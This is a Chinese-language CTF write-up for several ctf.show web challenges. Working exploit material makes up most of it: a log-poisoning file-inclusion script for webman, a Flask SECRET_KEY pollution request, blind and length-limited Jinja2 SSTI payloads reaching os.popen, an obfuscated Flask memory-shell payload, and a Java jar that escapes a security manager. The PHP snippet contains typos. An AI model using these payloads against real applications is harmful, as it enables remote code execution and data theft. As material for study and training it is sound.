DSBCTF_单身杯-web#

签到·好玩的PHP#

代码审计

d,s,b会被强制转成字符串类型，值互相不相等，拼接后小于3，与ctf值不相等但是md5值相等

这里我们用尝试用PHP中的特殊浮点数常量NAN和INF，其中NAN不满足第一个if，因此这里使用INF

1
<?php
2
  class ctfshow {
3
        private $d = 'I';
4
        private $s = 'N';
5
        private $b = 'F';
6
        private $ctf = INF;
7
    $dsbctf = new ctfshow();
8

9
    echo urlencod(serialize($dasctf));
10
}

1
O%3A7%3A%22ctfshow%22%3A4%3A%7Bs%3A10%3A%22%00ctfshow%00d%22%3Bs%3A1%3A%22I%22%3Bs%3A10%3A%22%00ctfshow%00s%22%3Bs%3A1%3A%22N%22%3Bs%3A10%3A%22%00ctfshow%00b%22%3Bs%3A1%3A%22F%22%3Bs%3A12%3A%22%00ctfshow%00ctf%22%3Bd%3AINF%3B%7D

ctfshow{387963bc-f4af-4d69-8142-b720d0e752c8}

迷雾重重#

拿到源代码先查看控制器

1
<?php
2

3
namespace app\controller;
4

5
use support\Request;
6
use support\exception\BusinessException;
7

8
class IndexController
9
{
10
    public function index(Request $request)
11
    {
12

13
        return view('index/index');
14
    }
15

16
    public function testUnserialize(Request $request){
17
        if(null !== $request->get('data')){
18
            $data = $request->get('data');
19
            unserialize($data);
20
        }
21
        return "unserialize测试完毕";
22
    }
23

24
    public function testJson(Request $request){
25
        if(null !== $request->get('data')){
26
            $data = json_decode($request->get('data'),true);
27
            if(null!== $data && $data['name'] == 'guest'){
28
                return view('index/view', $data);
29
            }
30
        }
31
        return "json_decode测试完毕";
32
    }
33

34
    public function testSession(Request $request){
35
        $session = $request->session();
36
        $session->set('username',"guest");
37
        $data = $session->get('username');
38
        return "session测试完毕 username: ".$data;
39

40
    }
41

42
    public function testException(Request $request){
43
        if(null != $request->get('data')){
44
            $data = $request->get('data');
45
            throw new BusinessException("业务异常 ".$data,3000);
46
        }
47
        return "exception测试完毕";
48
    }
49

50

51
}

看到unserialize想到构造反序列化链，但是找魔术方法发现没有可利用的

session里面的内容不可控，只有testJson

上传的数据经过json解码交给view解析模板

查看/config/view.php，发现用的是原生类

我们跟进Raw的render方法

1
public static function render(string $template, array $vars, string $app = null, string $plugin = null): string
2
    {
3
        $request = request();
4
        $plugin = $plugin === null ? ($request->plugin ?? '') : $plugin;
5
        $configPrefix = $plugin ? "plugin.$plugin." : '';
6
        $viewSuffix = config("{$configPrefix}view.options.view_suffix", 'html');
7
        $app = $app === null ? ($request->app ?? '') : $app;
8
        $baseViewPath = $plugin ? base_path() . "/plugin/$plugin/app" : app_path();
9
        $__template_path__ = $app === '' ? "$baseViewPath/view/$template.$viewSuffix" : "$baseViewPath/$app/view/$template.$viewSuffix";
10

11
        if(isset($request->_view_vars)) {
12
            extract((array)$request->_view_vars);
13
        }
14
        extract($vars);
15
        ob_start();
16
        // Try to include php file.
17
        try {
18
            include $__template_path__;
19
        } catch (Throwable $e) {
20
            ob_end_clean();
21
            throw $e;
22
        }
23

24
        return ob_get_clean();
25
    }
26
}

我们关注extract( $vars);include$ template_path;

extract($vars)能让我们修改内存中变量，造成变量覆盖漏洞

我们只需要覆盖掉$__template_path__即可转为文件包含漏洞

这里我们尝试包含框架日志文件，通过下面方法探测文件路径

1
def get_webroot():
2
    print("[+] Getting webroot...")
3

4
    webroot = ""
5

6
    for i in range(1,300):
7
        r = requests.get(url=url+'index/testJson?data={{"name": "guest", "__template_path__": "/proc/{}/cmdline"}}'.format(i))
8
        time.sleep(0.2)
9
        if "start.php" in r.text:
10
            print(f"[\033[31m*\033[0m] Found start.php at /proc/{i}/cmdline")
11
            webroot = r.text.split("start_file=")[1][:-10]
12
            print(f"Found webroot: {webroot}")
13
            break
14
    return webroot

我们将模板引擎覆盖为我们构造的payload，发送给服务器触发报错,使框架的日志系统将这个错误的参数值原封不动地写入当天的日志文件中

1
def send_shell(webroot):
2
    #payload = 'index/testJson?data={{"name":"guest","__template_path__":"<?php%20`ls%20/>{}/public/ls.txt`;?>"}}'.format(webroot)
3
    payload = 'index/testJson?data={{"name":"guest","__template_path__":"<?php%20`cat%20/s00*>{}/public/flag.txt`;?>"}}'.format(webroot)
4
    r = requests.get(url=url+payload)
5
    time.sleep(1)
6
    if r.status_code == 500:
7
        print("[\033[31m*\033[0m] Shell sent successfully")
8
    else:
9
        print("Failed to send shell")

最后我们让PHP引擎去运行这个日志文件，使我们构造的命令得以执行

1
def include_shell(webroot):
2
    now = datetime.now()
3
    payload = 'index/testJson?data={{"name":"guest","__template_path__":"{}/runtime/logs/webman-{}-{}-{}.log"}}'.format(webroot, now.strftime("%Y"), now.strftime("%m"), now.strftime("%d"))
4
    r = requests.get(url=url + payload)
5
    time.sleep(5)
6
    r = requests.get(url=url + 'flag.txt')
7
    if "ctfshow" in r.text:
8
        print("=================FLAG==================\n")
9
        print("\033[32m" + r.text + "\033[0m")
10
        print("=================FLAG==================\n")
11
        print("[\033[31m*\033[0m] Shell included successfully")
12
    else:
13
        print("Failed to include shell")

探测存在的文件

flag 在/s000ecretF1ag999.txt

ctfshow{cdc533ec-485e-4014-8d78-41182c0902e9}

下面给出官方脚本

1
import requests
2
import time
3
from datetime import datetime
4

5
# 注意 这里题目地址 应该https换成http
6
url = "http://df5eca96-11bc-402c-83ae-523693014a25.challenge.ctf.show/"
7

8

9
# Author: ctfshow h1xa
10
def get_webroot():
11
    print("[+] Getting webroot...")
12

13
    webroot = ""
14

15
    for i in range(1, 300):
16
        r = requests.get(
17
            url=url + 'index/testJson?data={{"name": "guest", "__template_path__": "/proc/{}/cmdline"}}'.format(i))
18
        time.sleep(0.2)
19
        if "start.php" in r.text:
20
            print(f"[\033[31m*\033[0m] Found start.php at /proc/{i}/cmdline")
21
            webroot = r.text.split("start_file=")[1][:-10]
22
            print(f"Found webroot: {webroot}")
23
            break
24
    return webroot
25

26

27
def send_shell(webroot):
28
    # payload = 'index/testJson?data={{"name":"guest","__template_path__":"<?php%20`ls%20/>{}/public/ls.txt`;?>"}}'.format(webroot)
29
    payload = 'index/testJson?data={{"name":"guest","__template_path__":"<?php%20`cat%20/s00*>{}/public/flag.txt`;?>"}}'.format(
30
        webroot)
31
    r = requests.get(url=url + payload)
32
    time.sleep(1)
33
    if r.status_code == 500:
34
        print("[\033[31m*\033[0m] Shell sent successfully")
35
    else:
36
        print("Failed to send shell")
37

38

39
def include_shell(webroot):
40
    now = datetime.now()
41
    payload = 'index/testJson?data={{"name":"guest","__template_path__":"{}/runtime/logs/webman-{}-{}-{}.log"}}'.format(
42
        webroot, now.strftime("%Y"), now.strftime("%m"), now.strftime("%d"))
43
    r = requests.get(url=url + payload)
44
    time.sleep(5)
45
    r = requests.get(url=url + 'flag.txt')
46
    if "ctfshow" in r.text:
47
        print("=================FLAG==================\n")
48
        print("\033[32m" + r.text + "\033[0m")
49
        print("=================FLAG==================\n")
50
        print("[\033[31m*\033[0m] Shell included successfully")
51
    else:
52
        print("Failed to include shell")
53

54

55
def exploit():
56
    webroot = get_webroot()
57
    send_shell(webroot)
58
    include_shell(webroot)
59

60

61
if __name__ == '__main__':
62
    exploit()

官方推理

nginx apache 不存在，排除日志包含的思路
pearcmd 由于命令行启动这里不能使用php-fpm的方式包含pearcmd.php来getshell
session 文件包含需要找到网站部署的目录名字进行绝对路径包含相对路径无法定位到session文件
文件上传未开启无法包含临时文件和文件上传 session
远程文件包含测试发现除了file协议其他伪协议并未开启

ez_inject#

注册登录后发现有个secret路由需要admin才能登陆

我们尝试在register处污染key

1
import requests
2
import json
3

4
url = "http://473b22fe-1306-46d1-abd4-30ee170d7469.challenge.ctf.show/register"
5
payload = {
6
    "username": "123",
7
    "password": "123",
8
    "__init__": {"__globals__": {"app": {"config": {"SECRET_KEY": "123"}}}},
9
}
10
r = requests.post(url=url, json=payload)
11
print(r.text)

成功之后登录，用unsign解密session，然后进行加密

1
D:\0Apython>flask-unsign --decode --cookie "eyJpc19hZG1pbiI6MCwidXNlcm5hbWUiOiJxd2UifQ.aUkjqA.V7Qqc8mh0kuq-3mbU_ElyCM8CU0" --secret "123"
2
{'is_admin': 0, 'username': 'qwe'}

换session后点击secret，提示在echo处有session可以确定是flask flask的ssti注入，我们这里用盲注

1
cycler["__in"+"it__"]["__glo"+"bals__"]  ["__bui"+"ltins__"].__import__('builtins').open('/flag').read(1)[0]=='c'

盲注

cycler: 这是 Jinja2 模板引擎（Flask 默认引擎）中的一个内置对象，用于在循环中轮换值。

.open('/flag').read(1)[0]:

read(1)：读取文件的前 1 个字符。

[0]：取出这个字符。

官方脚本

1
import requests
2
import concurrent.futures
3

4
url = "http://7d26c775-19b5-4001-88e3-fbba32c4e64c.challenge.ctf.show/echo"
5
strings = "qwertyuiopasdfghjklzxcvbnm{}-12334567890"
6
target = ""
7

8
headers = {
9
    "Content-Type": "application/x-www-form-urlencoded",
10
    "cookie":"user=eyJpc19hZG1pbiI6MSwidXNlcm5hbWUiOiJ0ZXN0In0.ZzC9AQ.hbEoNTSwLImc98ykp0j_EJ_VlnQ"
11
}
12

13

14
def check_character(i, j, string):
15
    payload = '''
16
    cycler["__in"+"it__"]["__glo"+"bals__"]
17
    ["__bui"+"ltins__"].__import__('builtins').open('/flag').read({})[{}]=='{}'
18
    '''.format(j + 1, j, string)
19
    data = {"message": payload}
20
    r = requests.post(url=url, data=data, headers=headers)
21
    return string if r.status_code == 200 and "your answer is True" in r.text else None
22

23

24
with concurrent.futures.ThreadPoolExecutor(max_workers=10) as executor:
25
    for i in range(50):
26
        futures = []
27
        for j in range(50):
28
            for string in strings:
29
                futures.append(executor.submit(check_character, i, j, string))
30

31
        for future in concurrent.futures.as_completed(futures):
32
            result = future.result()
33
            if result:
34
                print(result)
35
                target += result
36
                if result == "}":
37
                    print(target)
38
                    exit()

官方尝试的内存马

1
url_for["\137\137\147\154\157\142\141\154\163\137\137"]  ["\137\137\142\165\151\154\164\151\156\163\137\137"]['eval']  ("app.after_request_funcs.setdefault(None, []).append(lambda resp: CmdResp if  request.args.get('cmd') and exec(\"global  CmdResp;CmdResp=__import__(\'flask\').make_response(__import__(\'os\').popen(requ  est.args.get(\'cmd\')).read())\")==None else resp)",  {'request':url_for["\137\137\147\154\157\142\141\154\163\137\137"]  ['request'],'app':url_for["\137\137\147\154\157\142\141\154\163\137\137"]  ['current_app']})

得到flag{2cfac8233-7268-4a4a-8d1a-741c090a57aa}

ezzz_ssti#

测试{{3*3}，回显9，说明这里是ssti

简单测试下发现没有过滤，但是限制了长度为40

https://blog.csdn.net/weixin_43995419/article/details/126811287

阅读该文章，我们可以将 Payload 保存在 config 全局对象中

Flask 框架中存在 config 全局对象，用来保存配置信息。

config 对象实质上是一个字典的子类，可以像字典一样操作。

因此要更新字典，我们可以使用 Python 中字典的 update() 方法。

1
{%set x=config.update(a=config.update)%}

用如下语句查看字典的键有没有更新

1
{%print(config.a)%}

继续

1
{%set x=config.a(f=lipsum.__globals__)%}   //f的值被更新为lipsum.__globals__
2
{%set x=config.a(o=config.f.os)%}          //o的值被更新为lipsum.__globals__.os
3
{%set x=config.a(p=config.o.popen)%}       //p的值被更新为lipsum.__globals__.os.popen
4
{{config.p("cat /f*").read()}}

ctfshow{8ae957ba-55a0-4cac-b5cf-22516ea30eea}

简单的文件上传#

我们先进行测试整理信息

可以上传.jar文件
可以执行.jar包
执行后有回显

我们尝试

1
import java.io.BufferedReader;
2
import java.io.InputStreamReader;
3

4
public class Exploit {
5
    public static void main(String[] args) {
6
        try {
7
            // 尝试读取 /flag 文件
8
            Process p = Runtime.getRuntime().exec("cat /flag");
9
            BufferedReader in = new BufferedReader(new InputStreamReader(p.getInputStream()));
10
            String line;
11
            while ((line = in.readLine()) != null) {
12
                System.out.println(line); // 这里的输出会显示在网页的 Output 区域
13
            }
14
        } catch (Exception e) {
15
            e.printStackTrace();
16
        }
17
    }
18
}

创建 Manifest 文件

1
Main-Class: Exploit

打包jar cvfm exploit.jar manifest.txt Exploit.class

发现java -jar 命令前面加了 -D java.securityManager 参数

我们先上传官方给的CTFshowCodeManager.so,改名为.jar

1
package com.ctfshow;
2

3
public class CTFshowCodeManager {
4
    public static native String eval(String str);
5

6
    static {
7
        System.load("/var/www/html/uploads/CTFshowCodeManager.jar");
8
    }
9
}

1
package com.ctfshow;
2

3
import java.io.IOException;
4

5
/* loaded from: JavaEngine.jar:com/ctfshow/Main.class */
6
public class Main {
7
    public static void main(String[] args) throws IOException {
8
        CTFshowCodeManager.eval("cat /secretFlag000.txt");
9
    }
10
}

加载刚才的so文件，然后执行命令

ctfshow{e33c8c80-541f-4133-8394-f19be971f7ac}